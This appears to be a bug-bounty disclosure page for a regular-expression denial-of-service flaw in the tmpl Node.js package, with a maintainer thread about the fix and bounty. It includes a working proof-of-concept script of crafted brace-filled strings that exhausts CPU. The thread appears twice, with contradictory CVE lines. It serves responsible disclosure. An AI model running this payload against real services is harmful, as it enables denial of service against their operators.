Inefficient Regular Expression Complexity in daaku/nodejs-tmpl

Valid

Reported on

Sep 4th 2021

✍️ Description

It allows cause a denial of service when formatting crafted string.

🕵️‍♂️ Proof of Concept

// PoC.js
var tmpl = require("tmpl")
for(var i = 1; i <= 50000; i++) {
       var time = Date.now();
       var attack_str = ""+"{".repeat(i*10000)+"answer";
        tmpl(attack_str, { answer: 42 })
       var time_cost = Date.now() - time;
       console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.

Occurrences

tmpl.js L1

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago

Yeting Li submitted a

2 years ago

commented 2 years ago

Admin

Hey Yeting, I've just contacted the maintainer about this report for you. Good job!

We have contacted a member of the daaku/nodejs-tmpl team and are waiting to hear back 2 years ago

commented 2 years ago

Maintainer

Seems reasonable. I pushed a fix in v1.0.5. Thanks for the report.

commented 2 years ago

Researcher

Thank you for your information @admin and thank you for your confirmation @daaku

commented 2 years ago

Admin

@daaku - are you able to mark as valid and confirm fix, so that the researcher gets rewarded for their efforts!

daaku validated this vulnerability 2 years ago

Yeting Li has been awarded the disclosure bounty

The fix bounty is now up for grabs

daaku marked this as fixed with commit 4c654e 2 years ago

Yeting Li has been awarded the fix bounty

This vulnerability will not receive a CVE

commented 2 years ago

Admin

CVE published! 🎉

Ref: CVE-2021-3777

commented 2 years ago

Researcher

Thanks a lot!😄

to join this conversation

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago

Yeting Li submitted a

2 years ago

commented 2 years ago

Admin

Hey Yeting, I've just contacted the maintainer about this report for you. Good job!

We have contacted a member of the daaku/nodejs-tmpl team and are waiting to hear back 2 years ago

commented 2 years ago

Maintainer

Seems reasonable. I pushed a fix in v1.0.5. Thanks for the report.

commented 2 years ago

Researcher

Thank you for your information @admin and thank you for your confirmation @daaku

commented 2 years ago

Admin

@daaku - are you able to mark as valid and confirm fix, so that the researcher gets rewarded for their efforts!

daaku validated this vulnerability 2 years ago

Yeting Li has been awarded the disclosure bounty

The fix bounty is now up for grabs

daaku marked this as fixed with commit 4c654e 2 years ago

Yeting Li has been awarded the fix bounty

This vulnerability will not receive a CVE

commented 2 years ago

Admin

CVE published! 🎉

Ref: CVE-2021-3777

commented 2 years ago

Researcher

Thanks a lot!😄

to join this conversation